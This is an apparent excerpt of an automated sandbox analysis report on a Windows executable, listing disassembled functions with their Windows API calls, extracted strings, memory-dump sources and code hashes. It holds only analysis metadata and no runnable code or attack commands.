            • GetDesktopWindow.USER32 ref: 01005B75
            • GetWindowRect.USER32(00000000), ref: 01005B7C
            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 01005BD3
            • GetClientRect.USER32(?,?), ref: 01005BE0
            • PostMessageW.USER32(?,00000005,00000000,?), ref: 01005C05
            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01005C2F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
            • String ID:
            • API String ID: 895679908-0
            • Opcode ID: 0eb90ab9d6642f723b065da0344810fd56cf2f01e2e9bcc222d891c25fb4954d
            • Instruction ID: 4d7080b0f03416a0a273bd71a249322167ad89931bf0f1b16f7bcc57ea9faea2
            • Opcode Fuzzy Hash: 0eb90ab9d6642f723b065da0344810fd56cf2f01e2e9bcc222d891c25fb4954d
            • Instruction Fuzzy Hash: 17714931900B09AFEB21DFA8CE85AAEBBF9FF48704F104959E582A2590D775B944CF50
            Function 00FC00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
            Download Yara Rule
            APIs
            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FC00C6
              • Part of subcall function 00FC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0107070C,00000FA0,AAA82A0A,?,?,?,?,00FE23B3,000000FF), ref: 00FC011C
              • Part of subcall function 00FC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00FE23B3,000000FF), ref: 00FC0127
              • Part of subcall function 00FC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00FE23B3,000000FF), ref: 00FC0138
              • Part of subcall function 00FC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FC014E
              • Part of subcall function 00FC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FC015C
              • Part of subcall function 00FC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FC016A
              • Part of subcall function 00FC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FC0195
              • Part of subcall function 00FC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FC01A0
            • ___scrt_fastfail.LIBCMT ref: 00FC00E7
              • Part of subcall function 00FC00A3: __onexit.LIBCMT ref: 00FC00A9
            Strings
            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FC0122
            • kernel32.dll, xrefs: 00FC0133
            • SleepConditionVariableCS, xrefs: 00FC0154
            • InitializeConditionVariable, xrefs: 00FC0148
            • WakeAllConditionVariable, xrefs: 00FC0162
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
            • API String ID: 66158676-1714406822
            • Opcode ID: cb84606643803ce39c60148720bd92b5047af90626041975c6c788523ec59840
            • Instruction ID: dcb0cb476b77db08c8db53017d650c7c3291ff887a7bb79fec242454db802eaa
            • Opcode Fuzzy Hash: cb84606643803ce39c60148720bd92b5047af90626041975c6c788523ec59840
            • Instruction Fuzzy Hash: 9A21F232D45712ABE7216B65AE0BF69B39CEB45B61F04012EF881F6144DF798C009B51
            Function 010030F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen
            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
            • API String ID: 176396367-1603158881
            • Opcode ID: 1481de3fc263af1a57624942ca13e53985ad6272837d5d2edc91f54ca2660bc3
            • Instruction ID: 9170645604ec0599218c1c267dfabe1c6489d13079a89f19e72304d20bbfb4b6
            • Opcode Fuzzy Hash: 1481de3fc263af1a57624942ca13e53985ad6272837d5d2edc91f54ca2660bc3
            • Instruction Fuzzy Hash: 6DE11532A005169FEB5B9F68C851BEEFBB4BF04750F148159E496FB281DF30A945CB90
            Function 010144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
            Download Yara Rule
            APIs
            • CharLowerBuffW.USER32(00000000,00000000,0103CC08), ref: 01014527
            • _wcslen.LIBCMT ref: 0101453B
            • _wcslen.LIBCMT ref: 01014599
            • _wcslen.LIBCMT ref: 010145F4
            • _wcslen.LIBCMT ref: 0101463F
            • _wcslen.LIBCMT ref: 010146A7
              • Part of subcall function 00FBF9F2: _wcslen.LIBCMT ref: 00FBF9FD
            • GetDriveTypeW.KERNEL32(?,01066BF0,00000061), ref: 01014743
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharDriveLowerType
            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
            • API String ID: 2055661098-1000479233
            • Opcode ID: cd91b27d33b39845c3d266c08f318a97d8bc6cb0128260defc74e5a56d3972df
            • Instruction ID: 5b67cd27b8210ad98316f64fedd0ff7690abcdd95081739f22d9cff5929a81f3
            • Opcode Fuzzy Hash: cd91b27d33b39845c3d266c08f318a97d8bc6cb0128260defc74e5a56d3972df
            • Instruction Fuzzy Hash: 36B122716083029FC710DF28C890A6EB7E5BF99724F40491DF5D6C72AAD738E844CBA2
            Function 0102AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
            Download Yara Rule
            APIs
            • _wcslen.LIBCMT ref: 0102B198
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102B1B0
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102B1D4
            • _wcslen.LIBCMT ref: 0102B200
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102B214
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102B236
            • _wcslen.LIBCMT ref: 0102B332
              • Part of subcall function 010105A7: GetStdHandle.KERNEL32(000000F6), ref: 010105C6
            • _wcslen.LIBCMT ref: 0102B34B
            • _wcslen.LIBCMT ref: 0102B366
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0102B3B6
            • GetLastError.KERNEL32(00000000), ref: 0102B407
            • CloseHandle.KERNEL32(?), ref: 0102B439
            • CloseHandle.KERNEL32(00000000), ref: 0102B44A
            • CloseHandle.KERNEL32(00000000), ref: 0102B45C
            • CloseHandle.KERNEL32(00000000), ref: 0102B46E
            • CloseHandle.KERNEL32(?), ref: 0102B4E3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
            • String ID:
            • API String ID: 2178637699-0
            • Opcode ID: 093ecfb51f216c23a5e3e94eaec4a327850dfd9587db53ad5ff24aa180c5b7e3
            • Instruction ID: 65093828f541d29402f3ed17a98f062587411340aaadc0960e4954eac327a728
            • Opcode Fuzzy Hash: 093ecfb51f216c23a5e3e94eaec4a327850dfd9587db53ad5ff24aa180c5b7e3
            • Instruction Fuzzy Hash: 4FF1CE715083109FD725EF28C891B6EBBE5AF85310F18859DF8D59B2A2CB35EC44CB52
            Function 00FA326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
            Download Yara Rule
            APIs
            • GetMenuItemCount.USER32(01071990), ref: 00FE2F8D
            • GetMenuItemCount.USER32(01071990), ref: 00FE303D
            • GetCursorPos.USER32(?), ref: 00FE3081
            • SetForegroundWindow.USER32(00000000), ref: 00FE308A
            • TrackPopupMenuEx.USER32(01071990,00000000,?,00000000,00000000,00000000), ref: 00FE309D
            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FE30A9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
            • String ID: 0
            • API String ID: 36266755-4108050209
            • Opcode ID: 4d6c4983bcb6acb776ea934e7fb73e094d36248c481568a0714d7b18ca3465a9
            • Instruction ID: d049561e1f9e4d6a47ff7a1a4fce890a937c51ce5feb80946b95af2c44502a90
            • Opcode Fuzzy Hash: 4d6c4983bcb6acb776ea934e7fb73e094d36248c481568a0714d7b18ca3465a9
            • Instruction Fuzzy Hash: 1D710771A40295BEFB318F25CC49FAABFA8FF05324F204216F515AA1D0C7B1AD50EB51
            Function 01036CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(?,?), ref: 01036DEB
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01036E5F
            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01036E81
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01036E94
            • DestroyWindow.USER32(?), ref: 01036EB5
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 01036EE4
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01036EFD
            • GetDesktopWindow.USER32 ref: 01036F16
            • GetWindowRect.USER32(00000000), ref: 01036F1D
            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01036F35
            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01036F4D
              • Part of subcall function 00FB9944: GetWindowLongW.USER32(?,000000EB), ref: 00FB9952
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
            • String ID: 0$tooltips_class32
            • API String ID: 2429346358-3619404913
            • Opcode ID: 0cd448c7a5822c065afb5ee3c135cc3535004c6df6582b751cc330e03e231a94
            • Instruction ID: 430361703257354b1dbad91cf70bcabbdb3c74f9777e48ef63d9acf66c9c97f9
            • Opcode Fuzzy Hash: 0cd448c7a5822c065afb5ee3c135cc3535004c6df6582b751cc330e03e231a94
            • Instruction Fuzzy Hash: 80716B70504244AFEB61CF1DC844A6ABBF9FBC9304F44045EFAD997261C776AA06DB21
            Function 0103911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • DragQueryPoint.SHELL32(?,?), ref: 01039147
              • Part of subcall function 01037674: ClientToScreen.USER32(?,?), ref: 0103769A
              • Part of subcall function 01037674: GetWindowRect.USER32(?,?), ref: 01037710
              • Part of subcall function 01037674: PtInRect.USER32(?,?,01038B89), ref: 01037720
            • SendMessageW.USER32(?,000000B0,?,?), ref: 010391B0
            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 010391BB
            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 010391DE
            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01039225
            • SendMessageW.USER32(?,000000B0,?,?), ref: 0103923E
            • SendMessageW.USER32(?,000000B1,?,?), ref: 01039255
            • SendMessageW.USER32(?,000000B1,?,?), ref: 01039277
            • DragFinish.SHELL32(?), ref: 0103927E
            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 01039371
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
            • API String ID: 221274066-3440237614
            • Opcode ID: e3663d1cddf262f59e72e6b2fe8afe51a98c4f46b7c0cc673aa4946711804459
            • Instruction ID: 2c63138a047945b25fa9b60196b1f6071a90f5faea7f5fde1a50c6528e5276a6
            • Opcode Fuzzy Hash: e3663d1cddf262f59e72e6b2fe8afe51a98c4f46b7c0cc673aa4946711804459
            • Instruction Fuzzy Hash: 446179B1108301AFD711EF64CC85DAFBBE8EFC9350F00092EF591922A0DB75AA49CB52
            Function 0101C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
            Download Yara Rule
            APIs
            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0101C4B0
            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0101C4C3
            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0101C4D7
            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0101C4F0
            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0101C533
            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0101C549
            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0101C554
            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0101C584
            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0101C5DC
            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0101C5F0
            • InternetCloseHandle.WININET(00000000), ref: 0101C5FB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
            • String ID:
            • API String ID: 3800310941-3916222277
            • Opcode ID: 11b8cd2c1303ba086e1ef846a1f028cdfee0bc3eceb5eadf2a640c752ed492a7
            • Instruction ID: 66b33e06e0b4682984b40fcc5fa8f4c8070cfb4d9a4c9b7c9795f3aa8251cf7a
            • Opcode Fuzzy Hash: 11b8cd2c1303ba086e1ef846a1f028cdfee0bc3eceb5eadf2a640c752ed492a7
            • Instruction Fuzzy Hash: 5D513DB1540605BFFB229FA4CA48ABB7BFCFF08754F00441AF986D6244DB39D9449B60
            Function 0103856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 01038592
            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385A2
            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385AD
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385BA
            • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385C8
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385D7
            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385E0
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385E7
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385F8
            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0103FC38,?), ref: 01038611
            • GlobalFree.KERNEL32(00000000), ref: 01038621
            • GetObjectW.GDI32(?,00000018,?), ref: 01038641
            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 01038671
            • DeleteObject.GDI32(?), ref: 01038699
            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 010386AF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
            • String ID:
            • API String ID: 3840717409-0
            • Opcode ID: 7e4bcc693e830a5173540565817fb200206085bd74dd0f874b96007ad18ee2cc
            • Instruction ID: 714b8ff83c0ae5f9e1eb46b4efb00a3c95b435400702aab4fb020df2319ca9b5
            • Opcode Fuzzy Hash: 7e4bcc693e830a5173540565817fb200206085bd74dd0f874b96007ad18ee2cc
            • Instruction Fuzzy Hash: 4A413D75600204BFEB219F69CD48EAE7BBCFF89711F00819AF949E7250D7359901DB60
            Function 010114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(00000000), ref: 01011502
            • VariantCopy.OLEAUT32(?,?), ref: 0101150B
            • VariantClear.OLEAUT32(?), ref: 01011517
            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 010115FB
            • VarR8FromDec.OLEAUT32(?,?), ref: 01011657
            • VariantInit.OLEAUT32(?), ref: 01011708
            • SysFreeString.OLEAUT32(?), ref: 0101178C
            • VariantClear.OLEAUT32(?), ref: 010117D8
            • VariantClear.OLEAUT32(?), ref: 010117E7
            • VariantInit.OLEAUT32(00000000), ref: 01011823
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
            • String ID: %4d%02d%02d%02d%02d%02d$Default
            • API String ID: 1234038744-3931177956
            • Opcode ID: 19b25d74ebf0e0c0a28c9f2693c911add9918d210364c2e53493149d34b8909d
            • Instruction ID: c32b812ab741dc4f7fa2b715d2cd71d993c2e1221d7e1ce3df7471055dbbd5f0
            • Opcode Fuzzy Hash: 19b25d74ebf0e0c0a28c9f2693c911add9918d210364c2e53493149d34b8909d
            • Instruction Fuzzy Hash: 2ED10371A00515DBEB189F75D884BBDB7B5BF05700F088096F6D6AB288DB3CD844DBA2
            Function 0102B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 0102C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0102B6AE,?,?), ref: 0102C9B5
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102C9F1
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA68
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA9E
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102B6F4
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102B772
            • RegDeleteValueW.ADVAPI32(?,?), ref: 0102B80A
            • RegCloseKey.ADVAPI32(?), ref: 0102B87E
            • RegCloseKey.ADVAPI32(?), ref: 0102B89C
            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0102B8F2
            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0102B904
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0102B922
            • FreeLibrary.KERNEL32(00000000), ref: 0102B983
            • RegCloseKey.ADVAPI32(00000000), ref: 0102B994
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
            • String ID: RegDeleteKeyExW$advapi32.dll
            • API String ID: 146587525-4033151799
            • Opcode ID: c988ed182f0d8b64a1dca5ddbd8f102da2b679078ffd2b831ed918be08ee61d6
            • Instruction ID: 653f069df00d435469858005f14bfb704acb463af80def9b520cbd1b67163d91
            • Opcode Fuzzy Hash: c988ed182f0d8b64a1dca5ddbd8f102da2b679078ffd2b831ed918be08ee61d6
            • Instruction Fuzzy Hash: 49C1B374208251AFE720DF18C494F2ABBE5FF85308F58849CF59A8B392CB75E845CB91
            Function 0102255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
            Download Yara Rule
            APIs
            • GetDC.USER32(00000000), ref: 010225D8
            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 010225E8
            • CreateCompatibleDC.GDI32(?), ref: 010225F4
            • SelectObject.GDI32(00000000,?), ref: 01022601
            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0102266D
            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 010226AC
            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 010226D0
            • SelectObject.GDI32(?,?), ref: 010226D8
            • DeleteObject.GDI32(?), ref: 010226E1
            • DeleteDC.GDI32(?), ref: 010226E8
            • ReleaseDC.USER32(00000000,?), ref: 010226F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
